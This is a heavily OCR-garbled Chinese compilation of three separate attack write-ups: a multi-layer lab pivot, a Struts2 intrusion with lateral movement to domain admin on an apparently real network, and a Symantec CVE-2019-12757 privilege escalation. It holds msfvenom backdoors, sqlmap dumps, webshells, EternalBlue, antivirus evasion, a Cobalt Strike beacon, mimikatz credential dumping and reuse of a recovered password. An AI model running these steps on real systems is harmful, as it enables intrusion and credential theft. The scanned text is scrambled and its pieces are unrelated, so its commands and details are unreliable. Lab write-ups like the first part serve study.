3、 通 过 蚁 剑 将 shel1 .elf 文 件 上 传 到 Target1i 中 ， 并 赋予 777 权 限 以 执行 


(www:/www/wwwroot/ThinkPHP/public) $ chmod 777 shell.elf 
(www:/www/wwwroot/ThinkPHP/public) $ ./shell.elf 
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![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CES17.pn92) Erw 
4、 此 时 MSF 获取 到 she11， 通 过 meterpreter 添 加 第 二 层 的 路 由 


run autoroute -s 192.168.22.0/24 run autoroute -p 


这 一 步 也 可 以 使 用 run postymultymanage/autoroute 自 动 添加 路 由 


![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS18.png) 
5、 在 MSF 中 添加 代理 ， 以 便 让 攻击 机 访问 靶 机 2， 经 过 多 次 测试 ， 发 现 MSF 使 用 socks5 代 理 总 是 失败 ， 因 此 


b 


msf5 > use auxiliary/server/socks4a msf5 auxiliary(server/socks4a) > set srvport 2222 msf5 
auxiliary(server/socks4a) > options msf5 auxiliary(server/socks4a) > run 


![]T(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS19.png) 
6、 修 改 proxychains -ng 的 配置 文件 ， 这 里 也 可 以 使 用 proxychains 进 行 代理 ， 不 过 前 者 是 后 者 的 升级 版 ， 


b 
root@kali:~# vim /etc/proxychains.conf 加 入 以 下 内 容 : socks4 192.168.1.113 2222 


![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS12.png) 
7、 尝 试 扫描 靶 机 2， 该 步骤 如 果 一 直 提示 超时 ， 可 以 把 MSF 退出 再 重新 配置 


root@kali:~# proxychains4 птар -Pn -sT 192.168.22.22 -Pn: 扫描 主机 检测 其 是 否 受到 数据 包 过 
滤 软 件 或 防火 墙 的 保护 。 -sT: 扫描 TCP 数 据 包 已 建立 的 连接 connect 


! [](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS21.png) 

# 0x03 Target2 

ЯН a、 获 取 shell 

1、 上 一 步 发 现存 在 89 端 口 ， 因 此 我 们 设置 好 浏览 器 代理 后 ， 打 开 看 看 
![](https://teamssix.oss-cn-hangzhou.aliyuncs,com/CFS22.png) 

! []T(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS23.png) 

2、 拿 到 站 点 后 ， 经 过 简单 的 信息 收集 ， 不 难 找到 robots .txt 文件 中 隐藏 的 后 台地 址 以 及 主页 源码 中 给 的 提 ; 
! [T(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS24.png) 
![]T(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS25.png) 
![T(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS26.png) 

3、 目 前 为 止 ， 步 骤 就 很 鲜明 了 ， 利 用 SQL 注入 找到 后 台 管 理 员 账号 密码 ， 那 就 用 sqlmap 开 整 吧 


root@kali:~# proxychains4 sqimap -u "521221602 /lindex.php?rzvul&keyword-1" -p 
keyword 


! [](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS27.png) 
4、 已 经 发 现 了 此 站 点 的 数据 库 为 MySQL， 使 用 的 Nginx 和 php， 接 下 来 找 库 





2034 


root@kali:~# proxychains4 sqimap -u "hiip //192,168.22.22/index.php?r=vu Skeyword-1".-p 
keyword --dbs 


![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS28.png) 
5、 看 看 bagecms 下 有 哪些 表 


root@kali:~# proxychains4 sqimap -u " 192.168.22.22/index.php?! 1 zi"-p 
keyword -D bagecms --tables 


![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS29.png) 
6, Ж- Fbage admin FÉ zi 


root@kali:~# proxychains4 sglmap -u " 
keyword -D bagecms -T bage admin --columns 


![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS30.png) 
7、username、password 自 然 是 最 感 兴 趣 的 啦 ， 给 它 dump 下 来 ， 在 dump 的 过 程 中 sqlmap 会 有 一 些 提 示 ，- 


root@kali:~# proxychains4 sglmap -u 0002 22/index.php?rzvul&ke d=1" -p 
keyword -D bagecms -T bage_admin -C username ET --dump 


![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS31.png) 

8、 找 到 我 们 想 要 的 了 ， 登 陆 后 台 ， 看 看 有 哪些 功能 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS32. png) 

9、 后 台 里 面 有 文件 上 传 的 地 方 ， 有 编辑 主页 文件 的 地 方 ， 为 了 方便 ， 我 们 直接 把 一 句 话 写 入 网 站 文件 中 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS33.png) 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS34.png) 

10、 来 到 标签 页 ， 可 以 看 到 一 句 话 生效 了 ， 接 下 里 在 Sockscap 中 打开 蚁 剑 ， 利 用 蚁 剑 连 接 ， 注 意 SocksCcap 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS35.png) 
![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS36.png) 

## b、 设 置 代理 

1、 蚁 剑 中 可 以 看 到 这 是 一 个 64 位 的 1inux 系 统 ， 据 此 信息 在 MSF 中 生成 后 门 


root@kali:~# msfvenom -p linux/x64/meterpreter/bind tcp LPORT-4321 -f elf > shell2.elf 


! []J(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS37.png) 
2、 利 用 蚁 剑 将 shel12 .elf 上 传 到 Target2 并 开启 监听 


(www:Awwwlwwwroot/upload) $ chmod 777 shell2.elf (www:/www/wwwroot/upload) $ ./shell2.elf 
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![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS38.png) 
” 


3、 在 MSF 中 开启 EXP， 与 Target2 建 立 连接 ， 这 里 需要 注意 ， 上 一 次 代理 使 用 的 reverse_tcp 是 MSF 作为 监 


> 


msf5 > use exploit/multilhandler msf5 exploit(multi/handler) > set payload 
linux/x64/meterpreter/bind tcp msf5 exploit(multi/handler) > set RHOST 192.168.22.22 msf5 
exploit(multi/handler) > set LPORT 4321 msf5 exploit(multi/handler) > options msf5 
exploit(multi/handler) » run 


!'[T(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS39.png) 
4、 与 之 前 一 样 ， 我 们 添加 Target3 的 路 由 ， 这 里 就 不 用 设置 代理 了 ， 直 接 添加 路 由 即 可 


run autoroute -s 192.168.33.0/24 run autoroute -p 


!'[]T(https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS40.png) 
5、 尝 试 扫描 Target3 


root@kali:~# proxychains4 nmap -Pn -sT 192.168.33.33 


!'[](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS43.png) 
# 0x03 Target3 


Ян a、 获 取 shell 
1、 从 扫描 的 结果 来 看 ， 不 难看 出 这 是 一 个 开放 着 445、3389 端 口 的 windows 系 统 ， 那 就 先 用 永恒 之 蓝 攻 击 斌 


» 


msf5 > use exploit/windows/smb/ms17 010 psexec msf5 
exploit(windows/smb/ms17 010 рѕехес) > set payload windows/meterpreter/bind tcp msf5 
exploit(windows/smb/ms17 010 рѕехес) > set RHOST 192.168.33.33 msf5 
exploit(windows/smb/ms17 010 рѕехес) > options msf5 
exploit(windows/smb/ms17 010 рѕехес) > run 


![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/CFS44.png) 


2、 查 看 账户 ， 直 接 修改 账户 密码 ， 利 用 3389 连 接 ， 注 意 要 在 Sockscap 中 运行 连接 远程 桌面 程序 
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meterpreter > shell C:\Windows\system32>net user C:\Windows\system32>net user Administrator 
123" 


meterpreter » shell 

Process 1528 created. 

Channel 4 created. 

Microsoft Windows [ii 6.1.7601] 

ШЕИ (с) 2009 Microsoft Corporationi 


C:\Windows\system32>net user 
net user 


Administrator 


C:\Windows\system32>net user Administrator] 
net user Administrator 123 


Wen ood 





i "on (а 


0x04 i£ 


到 目前 为 止 ， 三 合 靶 机 都 已 经 拿 下 ， 这 里 推荐 读者 能 够 自己 亲手 尝试 ， 找 到 里 面 的 flag， 其 中 所 有 
flag 的 找寻 方式 。 


这 次 的 练习 耗费 了 自己 的 大 量 时 间 ， 从 靶场 搭建 到 获取 到 第 三 层 拔 机 的 shell， 这 其 中 碰 到 的 一 些 问 
题 及 我 自己 踩 过 的 一 些 坑 现 记录 在 下 面 : 


1、 蚁 剑 中 查看 一 些 文 件 会 提示 权限 不 足 ， 在 meterpreter 中 可 以 正常 查看 2、 蚁 剑 中 在 Target2 里 执 
行 命令 或 者 碍 看 文件 时 不 时 会 失败 ， 初 步 判 断 是 因为 本 地 网 络 代理 的 原因 ， 多 试 几 次 就 行 ， 总 有 一 
次 是 成 功 的 3、MSF 中 Socks5 代 理 模块 使 用 总 是 失败 ，Socks4a 模 块 使 用 成 功 4、MSF 中 建立 的 会 
话 总 是 自动 断 开 ， 将 会 话 连 接 的 靶 机 上 的 防火 墙 关 闭 即 可 5、MSF 中 ms17_010_eternalblue 模 块 利 


用 总 是 失败 ，ms17_010_psexec 模 块 使 用 成 功 6、meterpreter 中 查看 文件 的 路 径 和 Windows 下 文件 





的 路 径 里 的 1" 是 相反 的 7、meterpreter 中 上 传 文件 大 小 貌似 有 限制 ， ee 
М, 因此 需要 将 文件 压缩 成 多 个 小 文件 进行 上 传 ， 同时 上 传 7- -zip 工 具 (该 工具 只 a 有 1M 大 小 ) ， 
利用 7-zip 对 其 解压 即 可 ， 当 然 此 方法 仅 适 用 于 Windows，linux 上 的 方法 可 以 自行 谷歌 


BBS 

hitr 

htt, 

http t 

https://l d 1 1 197773€ 

pot i3 d 上 文章 各 - — 
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记 一 次 简单 的 漏洞 利用 与 横向 
1.strust2-016 获 取 权 限 system 权 限 


2019/11/12 11:02:14 一 一 敬告: 存在 Struts2 远 程 代码 执行 握 : 滞 -编号 52-016 
2019/11/12 11:02:14 一 一 返回 验证 标志 : struts2_security_check 


х ш 


BW»: http://w " 


E 020 | | m 


基本 信息 ”命令 执行 文件 上 传 ” 批 里 验证 




















ínt authori ty\system 


2. 写 入 冰 蝎 SHELL: 


< http: empjsp E v201 > o =й 





URL: http z/vi- xa d/temp jsp. cu 
МАЛАЙ OORT ЖЫН ХӨНН босын БОЗ! RAT APRS вся т нда 


USERPROFILE: C Windows 
Program Dans C: Pregnant ote 

РАГНІХІ COM. EXE HAT CMD VRS VBE. ы ММ МАН MS 

System нуе € 

H MP С Windows TEMP 

Progrand'sles: C Program Files 

Path € Windows system? 87 Wika E Widows Systems) Whon C Windows Syston? Watdow PowerShell LF C Program Piles Mictisoft SOE Server SE Tooke Hing C. Program Piles Micrsoft SQL Server 90 
DIS Harm t” Program D ales Mieconifl SOL Server Tools ана C Program Fles Mennet SOL Server 90 Fool Binn VSShell Comma HUE C Pregnan Files Mieres У тағай Studio 8 Conmow? TD) Pocate Nsembles 
PROCESSOR REVISION oid 
USERDOMAIN. WORKGROUP 

M LUSERSPROFILE: € Preerambata 

PROCESSOR DENTIFIER x86 Fanny 6 Modet 15 Stepping 15, биис 
IMP. € Widows TEMP 

Common rogram ties V. Program E les ommon Filles 

PROCESSOR ARCHITECTURE хе 

OS Windows NI 

Үр No HOST CHECK NO 

PROCESSOR LEVEL 6 

LOCALAPPDATA € Windows system 8? confir systemprofile AppData Local 
hb C Program Piles SQENME din 

КОМИЛ ИМАМ WI BP 

windi €C Windows 

Systemioot C Windows 

NUMBER OF PROCESSORS 了 

USERNAME ЖАНЫМ 5 

еМ Path C Windows stem? WindowsPowgrShell v| 0 Modules 
PUBLIC C Users Public 

ComSpec € Windows system кли exe 

APPDATA (C Windeaes system V config systempratile- Appl ata санлар 


Semi? confie э: 





ЕДІН 










ETT 

Java-rusiime nase Jaca TM) SE Rantime Finanoment 
sain boot library path = С Program Files Java rc? bin 
java vi. version 23 2/01 

shared leader 

java.vm vendor © Orale Corporation 

java екінті Мір pava eras de con 

path separator 

отса! util buf StrngCache byte enabled лш 

Java whl. fogging confi file = (U d omcaté сөзі logging properties 
Јака vim same Јака HotSpot TND Chest VM. 
füle.eneoding pkg ~ simae 





User country “ 
wt 
[OL OM Жа v2.0.1 By rebeyond 


这 里 用 其 他 的 SHELL 会 失败 ， 因 为 服务 器 上 有 360: 
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TruelmageTryStartService, | 


QHWatchdoz exe 


svchost. exe 
Anyllesk. exe 
AnyDesk. exe 
‘'taskhost. exe 
dwm. exe 
explorer. exe 
taskeng. exe 


QHSafeTtay exe 





TrueImazeMonitor. exe 
TimounterMonitor. exe 
schedhlp. exe 

vkise. exe 
GWIdlMon. exe 
zonhost. exe 

cis. exe 
SearchIndexer. exe 
GlassWire. exe 
wmpnetwk. exe 
svchost. exe 
taskeng exe 
HaozipSve. exe 
taskhost. exe 

dragon updater. exe 
svchost. exe 
DailyNews. exe 
icefutil.exe 

cefutil. exe 





3. 因 为 360 的 原因 ， 这 里 常用 的 一 些 代 理 方 法 都 不 好 用 ， 于 是 通过 


3052 


3136 
3148 
3228 
3548 
560 
1104 
3080 
856 
3612 
716 
3864 
2160 
4528 
4584 
4604 
4636 
4672 
5056 
5080 
5156 
5456 
5844 
6016 
4436 
5332 
17532 
6644 
20292 
17044 
14012 
24300 
20772 





Services 


Services 
Services 
Services 
Services 
Console 
Console 
Console 
Console 
Console 
Console 
Console 
Console 
Console 
Console 
Console 
Console 
Console 
Console 
Console 
Console 
Services 
Console 
Services 
Services 
Console 
Services 
Console 
Services 
Services 
Console 
Console 
Console 








2040 


0 
0 
0 
0 
0 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
0 
1 
0 
0 
1 
0 
1 
0 
0 
1 
1 
1 





М 





reGeorg 进 行 代理 : 


上 传 tunnel.jsp， 但 是 直接 用 默认 名 字 上 传 的 话 ， 一 连接 就 会 被 360 杀 了 ， 这 里 想 了 一 下 把 名 字 改 成 


ç барде БЕКИ: PG Жез Gr 





admin.jsp 成 功 bypass: ; 本 地 
运行 : 





然后 proxifier 进 行 设置 : 
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Е "ne X % № - 
= һу > 
127.0.0.1 9999 SOCKS5 | C» 


检查 . . . 


您 可 以 将 一 些 代 理 服 务 器 链 在 一 起 : 代理 链 ... 


| 代理 规则 
规则 名 称 NH Hb EH Н — xfriireet- lí. 
E уа. ese Е ПРАТ Direi 


(ашо-сгеатей 


[Locattost firefox.exe; cmd.exe 127. 0.0.1: SC... Direct 


PYTHON WKY 





Proxy SOCKS5 12 v 


Default Direct 
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5y Proxifier 
xn KER P) gio HEV 帮助 (H) paeem 7 
Ld uid e 





应 用 程序 ”目标 Busy. 规则 :代理 вж ев 


fret eim ) aea 
© 


小 连接 uk end 





14. 33 0} р iw [ 

11.13 03 а E i 

11.13 01 л н dau ык 

m { х ot I 

1139 64 192. 10 DET. 1 0 «кк SOCKSS 

11.13. ж goog 9:4 ЕВ: i KE ңа. Y ML 07 

11.13 01:23:30] firefox. exe 64 - webexrensions. settings. services. бөлі На. com:443 ХИ. 1595 FW 0.55 KERIK. 4651 СЕЗ 4.54 NB) CHOR. EER 02:55 


“( 因 为 网 络 不 是 很 稳 ， 出 现 了 一 些 连接 失败 或 被 拒绝 的 问题 ) 
通过 翻 看 WEB 目 录 下 的 配置 文件 : 
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CNET 


теда 
. же C/Tomcté/webappi/PMC /WEB INF/applicationContepen | | 


«ні versions 1 07 encoding s "UTE 8&1» gsm cori 
* earn 
xmins = "http //www spengtramework org/schema/beans” 
«тїнє ey = "http //wwa w 3 0rg/2001/XMI Schema-instance" 
sseachemalocations "http //www springframework oeg/schema/beans http//www springtramework org/sc 


<bean xin dataSpurce" class= "org apache commons dix p.BasicDataSource" > 
<property name z "driver ы A 
<property name "uri" y; “ұй sqiserver 7/127 00 1 1433 databaseNames WEBZ" > < 
<property name - "user ` values "Sa" > </property> 
“property name "password" values "Sáadenin “emprona ” 
property name - "maxA te^ vaae-- D» /propeetyne 一 一 一 一 一 一 一 一 一 
<property name = makde’ values * 30" > < /peoperty» 
“property name < тамай" value + 500" > </property> 
* property name + "defaultAutoCommit" value « "true" > </property> 
« Jean» 





de 









«bean xt» "sessionkactory" class» "org sprigfrmework orm hibernate 3 LocalSessionf actoryBean" > 
<property name= “datasource” refs "dataSource' > </property> 
* property name = “hibernsteProperbes* > 
< Props» 
<prop key = “hibernate dialect" »org hibernate dialect SQLServer Dialect < /реор > 
* prop key = “hibernate show sal'»true«/prop» 
«нор > 
</property> 
<property name <“mappengResources” > 
dest» 
+ value > com/web/bean/Users hbm umi < value > 
* value > com/web/bean/Guwews Nom xmi < /value > 
x fint> 
</property> 
</bean> 


<bean кіс "userDao" class = "com web dso UserDAO" scope s “singleton” > 
* property name = езде actocy^ > 
«net bean 7 "sessonf actory /» 


</property> 
«bean» 
找到 一 个 密码 54admin Shean аб user MantanArtinn" nos "enm weh action (erdantainietion® «nne nrotntyne" > 然后 














| ths 

| T 

| 190 168 123 55 %0-46-%а-99-9Ь-65 МЕ 

| 192 168 123 56 00-0c-29-5£-78-1« p 

| 192 168 123 104 48-5%-39-е%-е3-34 10 
192 168 123 107 18-68-cb-6 c-di- 76 ik 
192 168 123 140 00-0с-29-3ж-а4-а8 16% 
190 168 123 155 6:-аа-14-32-20-1Ь iks 
192 168 123 156 78-24-af -B3-0f-29 te 
192 168 123 160 1с-%#-65-Ф-е5-13 (Ж 
192 168 123 161 10-b£-48-42-7b-be ins 
192 168 123 163 00-0<-22-70-34-2% mig 
192 168 123 164 00-0e-29-34-b1-66 e 
192 169 123 165 00-0c-29-Te-$2- Te iL 
192 168 123 166 00-0c-29-f c7 «6-65 is 
19? 168 123 168 54-24-15-49-45-6. pu 
192 168 123 173 00-0c-29-1£-98-2« i 
192 168 123 174 00-0е-29-45-44-41 e 
19? 168 123 177 70-4d-7b-04-11-40 T 
192 168 123 178 22-56-4--Ұ9-1.-Ы) ib 
192 168 123 185 BO ad d c7 aah ic 155 

| 192 168 123 168 00-14-«а-0#-э4-11 "a 

| 192 168 123 200 00-14-Tà-42-95-£7? 1 

| 192 168 123 201 00-11-32-34-һһ-62 

| 192 168 123 202 00-11-32-3#-%а-%а | 

| 192 168 123 203 00-11-32-3%-һа-ө2 

| 192 168 123 206 30-06-56 e- cE-34 

| 192 168 123 24 00-50-74-<9-03-40 

F 1192 168 123 255 НЕГЕ ТЕПЕ ГЕП | 
oa 122 22 «7900-00-16 Ең ` 
执行 arp -a 查看 内 网 大 概 有 哪些 机 器 0 ootas | 因为 已 经 设置 了 


”代理 ， 所 以 这 里 可 以 直接 对 内 网 机 器 进行 端口 探测 : 
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这 张 图 是 探测 出 来 的 部 分 信息 : 
.168.123.55:3389 ХР 
.168.123.288:3389 ХР 


.168.123.140:3389 мїп2ӨӨӨ<егуег 


.168.123.155:3389 міп2003 


.168.123. :3389 
.168.123. :3389 
.168.123. :3389 





使 用 上 面 得 到 的 密码 和 用 户 
名 administrator 进 行 党 试 ， 获 得 了 123.55、123.155 的 账号 密码 并 登陆 成 功 : 


192.168.123.55:3389 administrator/54admin 





i 


将 CobalStrike 的 后 门 丢 上 去 : 
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情况 1; 这 里 文件 拷贝 不 进去 ， 所 以 将 文件 委 到 同 处 一 个 内 网 的 WEB 跳 板 机 上 ， 进 行 访问 下 载 ) 


路 径 : C/Tomcat6/webapps/PMC/ 


名 称 

well-known 
aboutus jsp 
admin 

assets 
contactus-0 jsp 
contactus jsp 
contactus zip 
€55 

guest login jsp 
image jsp 
image? jsp 
images 

index jsp 
LangSelector Jsp 
logout jsp 
META-INF 

news jsp 

pop 

product jsp 
productlist jsp 
product detail jsp 
project mobirise 
гір «eee. 
script 

session jsp 

swf 

temp jsp 
WEB-INF 
welcome jsp 
upload 


Ж 收 改 时 间 

0 2019.11.12 20:06:30 
8534 2015-06-08 14.45.11 
4096 2019-11-12 12:22:00 
4096 2019.08.14 15:55:11 
39387 2015-06-03 16:59:48 
99 2019-03-26 09:20:08 
9563 2019-03-26 09:20:29 
4096 2019-10-19 08:30:08 
2019 2013-11-02 09:20:32 
1603 2013-11-02 09:20:32 
1604 2013-11-02 09:20:18 
65536 2019-09-06 13:54:32 
8707 2018-10-09 14:24:17 
1178 2013-11-02 09:20:32 
327 2013.11.02 09:20:30 
0 2017-05-11 11:01:14 
9379 2015-06-03 16:57:29 
4096 2019-08-13 11:32:02 
11122 2015-06-03 16:58:14 
8092 2015-06-03 16:58:38 
12775 2015-06-03 16:5903 
36885 2018-10-09 14:24:17 
28429 2019-11-12 22:15:24 
4096 2017-05-11 11:01:15 
16374 2015-06-03 16:58:38 
0 2017-05-11 11:01:19 
611 2019-11-12 22:31:25 
4096 2017-05-11 11:01:19 
516 2013.11.02 09:20:16 
0 2019-03-19 17:21:51 


情况 2: 上 面 有 杀 软 ， 按 理应 该 先 做 免 杀 ， 但 这 里 


因为 登陆 的 用 户 权限 较 高 ， 所 以 直接 关 掉 杀 软 的 部 分 查 杀 功 能 ， 同 时 将 文件 加 入 白 名 单 (Am 


LOW... 


) ， 运 行 后 就 上 线 了 : 
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同 理 其 他 机 器 也 是 相同 操作 。 


Og. Bes trl Cot” але 


C:MDocunents and Settings Administrator>net user 


NNFILESERUER 


UMuare Conv. Sf Administrator 


erps ys Guest 

IUSR. FILESERUER IUSR FIRESERUER 
jinmy nogei 

pc52 pu 

salee SUPPORT _38! 


C:\Docunents and Settings Wdministrator> 





fiSPNET 
Helpfissistant 
jason lin 

peSi 

public 








bracon sleep 10 

['i Tasked beacon to ar {йя 
allied home $0 bytes 
allied Nome tent 12 bytes 


qurpasswot 


Тәзкей beacon to zun mimikat; s sekurisa Lloqorpasswerds command 


hest called sent 610454 bytes 


ө01е4) 


NETWORK SERVICE 


MYT AUTHORITY 


00000002] Primary 

ETTET PRES 

Doma 1! LII Au) 
aad 34Ь4!)%%Ь5%14%404еелал43+Ь4315Ь51404е е 
ld6cte)dl16ae9 ilb? ic 594 !ей‹0йН9‹0 


jaleese6bkAb041255Shbtet956018%0a8ft 4 


4)826 (Q0000000 0000474) 
rcfínedioqontype trom 0 


(nnlli 





[ERP] Administrator */5772 
这 里 简单 看 了 下 内 网 情况 ， 


DYrighet icrocote Corp, 


C:sDocunents and Settings Mdninistratoronet view sdonain 


Dona in 


P 
SUoRKGROUP 


Docunents and Settings Wdninistrator?) w 





发 现 是 有 域 的 : 
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м ЕЕ.” my ET 
кіт 2 p 
2 oe Omen ы 
© SENA ім 
2 BETüAHNSISÜM ук 
Д Age meee ju 
; sentiet ж 
" Nouv ы 
jw 
其 他 位 器 а УЗ? 
je 
{% Малой Wuyov: Keteotk jos 
3 Le 17] s 
{у вте 
msnm 
ad PARS 
яшан А 
Жөзіпезр we ` 
登陆 192.168.123.155:3389 administrator/54admin 
找到 了 域 管理 员 账 号 : 
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说 明 当 前 用 户 就 是 域 管 理 员 了 。 


JE C WINDOWS yiten Ziend exe 


Document? aod Cings sadninistroteryunir qxeraceunnt 
mirum Deri ript ion 
yer State 
КЕРМА Разия 
ПТЕР 444498789 1017 
ERP account 
ий 1001012539 4144499789 10104 


эйи 1001017539. 4144490789. ИЙ 
ERP\AS PNET 
эйи (0010125609 4144490789 182€ 
ERP Ades dun 
ТИТТЕТЛТАРЛТЕТЕТІТТЕТЕТІ 
ки 
юм төйи 4144490789 020 
[ nes 
эми 1010472549 асела; ішін 
PRES Saver 
өй LUMIHIUSO) 4144490 іш? 
PRE aient 
ЕГІЛЕ ID Aadays ne 


atphet wp.exe) 


ий 1001012539 4144499 
LRPShe? 
уми LIMITING 4)444907 
PRPSEUKR ER 
эии ONES Y 414449289 
киришем PRP 
гуие 1001072839 4144490 
ERPS Any 
тои 1001037519 4144490785 
ERM nay 
^ yes 4144496: 
ERP neue й 
1016012539 4144490 
PRP 
IMIMIUS39 414449 Tm 
[rm 
ULM 3 4144490289 191 
ERP\pab dic 
1091837519 4144490289 1987 
ERPSsa1 
16814037519 4144490789 йе 
ERPSSHPFORT 288945 4M 
1001037519 4144490789. 100 
ERP Nacer 
10183753) 4144490789 1016 
FRE BNvare Cony SA Dedicated tzer to rnn Ufuare Converter Standatane server juh 


1817519 4144490789 3015 1 он 


、 — O O — S 2 


SN 2... 








кене 
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这 里 只 是 简单 利用 strust2 漏 洞 进行 了 内 网 简单 横向 ， 根 据 两 台 主 机 上 的 很 多 信息 完全 可 以 进 一 
向 ， 但 是 这 里 已 经 确定 能 够 内 网 横向 且 已 经 有 了 域 控 权限 就 没有 进一步 测试 了 。 
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y ` 
мы BH 


CVE-2019-12757: Symantec Endpoint Protection | 
中 的 本 地 特权 升级 


Symantec Endpoint Protection 版 本 : 


14.2 RU1 Build 3335 (14.2.3335.1000) 及 以 下 操作 系统 经 过 测试 windows 10 1803 x64 该 漏 
洞 是 与 Capital Group 安全 测试 小 组 的 Marcus Sailler, Rick Romo 和 Gary Muller 一 起 发 现 的 


FTIN 前 提 条 件 : 


为 了 可 靠 地 利用 此 漏洞 ， 需 要 禁用 Symantec Endpoint Protection 的 “防臭 改 " 功 能 。 在 大 型 组 织 中 禁 
用 自 改 保护 是 很 常见 的 事情 。 我 的 立场 是 ， 无 论 是 否 启 用 了 自 改 保护 ， 这 都 是 一 个 漏洞 。 禁 用 此 功 
ВЕ (我们 已 经 看 到 了 禁用 或 调 低 此 功能 的 各 种 环境 ) ， 该 漏洞 的 可 利用 性 很 高 。 启 用 防 自 改 功能 
后 ， 该 漏洞 仍然 存在 ， 但 可 利用 性 要 低 得 多 。 我 们 还 没有 花 时 间 来 反 转 过 滤器 驱动 程序 ， 但 是 在 启 
用 算 改 保护 的 情况 下 仍然 可 以 利用 它 。 


二 、 漏 洞 概述 : 


开始 扫描 后 ，ccSvcHst.exe 进 程 (作为 NT AUTHORITY \ SYSTEM) 将 检查 位 于 
“HKLM\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint 
Protection\AV\Scheduler\\Custom TasksV, 创建 后 ， 此 注册 表 项 将 被 授予 当前 登录 用 户 的 “完全 控 
БІЛЕ. TE"HKLMISOFTWAREWOWS432NodelSymanteclSymantec Endpoint 
Protection\AV\Scheduler\\” 上 创建 注册 表 符 号 链接 ， 并 将 其 指向 计算 机 注册 表 中 的 任意 位 置 ， 从 而 
导致 任意 注册 表 项 写 入 为 "NT AUTHORITYASYSTEM"， 并 允许 访问 DACL (自由 访问 控制 列表 ) ， 
用 于 完全 提升 主机 上 权限 。 


三 、 漏 洞 说 明 : 


扫描 开始 时 ，ccSvcHst.exe 进 程 (具有 NT AUTHORITY\SYSTEM 权 限 ) 检查 位 于 
“HKLM\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint 
Protection\AV\Scheduler\\Custom TasksW* 下 用 户 指 定 的 扫描 设置 。 如 果 登 录用 户 的 安全 标识 符 

(SID) 不 是 位 于 “HKLM\SOFTWARE\WWOW6432Node\Symantec\Symantec Endpoint 
Protection\AVN\Scheduler" 注 册 表 路 径 中 ， 则 ccSvcHst.exe 将 创建 它 (具有 NT 
AUTHORITY\SYSTEM 权 限 ) : 使 用 Procmon 查 看 注册 表 项 


mnt mU ome omm "ET t "72 SIND ee SELATAN C 


an 


RRRRAR 


运行 ccSvcHst.exe， 会 显 式 设置 自由 访问 控制 列表 (DACL) 以 包含 访问 控制 项 (ACE) ， 该 访问 
控制 项 允许 当前 登录 用 户 具有 “FullContro" 权 限 
HKLM\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\” o 
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Y (LOCAL. MACHINE \ SOFTWARE WOW 4 32NoGe V Symant ec ` Š 
?$@- 3720698071- 3650009049- 1002 


O: BAG: SYD: (4,01C110;£A;;;$-1.5-21- 2123539750- 3720698071 - 365@0@9069- 1002 





RNAP RÉxIHKLMSOFTWAREWOWS6432NodelSymanteciSymantec Endpoint 
Protection\AWScheduler\" 的 “FullControf" 权 限 ， 因 此 将 其 删除 并 将 其 替换 为 任意 路 径 的 注册 表 符 号 
链接 。 在 这 种 情况 下 ， 我 们 将 使 用 指向 “HKLM\SOFTWARE\WOW6432Node\Symantec\Symantec 
Endpoint Protection\AV\Scheduler\\" 的 符号 链接 替换 为 “HKLM\ SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution ; pon exe" 


C: Users 1омргіу > $user (System, Security. Principal WindowsIdentity]:: GetCurrent { 


9750-37 2069807 1 - 3650009049 - 1002 
\iowpriv> Remove-Item 


Users\lowpriv> 


$ C:\Users\lowpriv> 
:\Wsers\lowpriv> [NtApi Dot Me у}: :CreateSyabolictinx( 


LestwriteTine SubKeyCoun ValueCount 
t 


5-1-5-21-21235397956- 3720698... 6/27/2019 10:29:4... Ж. 

这 样 做 基本 上 将 “HKLM\SOFTWARE\WWOW6432Node\Symantec\Symantec Endpoint 
ProtectionWAWSchedulerN" 指 向 "HKLM\ SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image 
File Execution Options\wsqmcons.exe"。 当 ccSvcHst.exe 尝 试 在 扫描 开始 时 创建 注册 表 项 时 ， 它 将 
命中 符号 链接 并 创建 “HKLM\ SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Ороп сатен: exe”, 





vey pee 


е9 
PPMP, 


RI RRP 


当 ccSvcHost.exe 通 过 符号 链接 创建 “HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution Options\Wsqmcons.exe" 时 ， 它 会 在 通过 注册 表 项 授予 当 
前 登录 用 户 “ FullControl 2 [R : 


Ci\Users\lowpriv> Get-Ac1 


: Miócrosoft.PowerShell.CorevRegistry::HKEY LOCAL MACHINE NASOFTMARE \Microsoft \Nindows NTXCurrentVersionvImage 
File Execution Options \usqecons .exe 

: BUILTIN\Administrators 

: WT AUTHORITYASYSTEM 

і Everyone Allow Reackey 
BUTLTINVSAdeinisteatons Allow FullControl 
WINOONS \loepeiv: Allow FullControl 


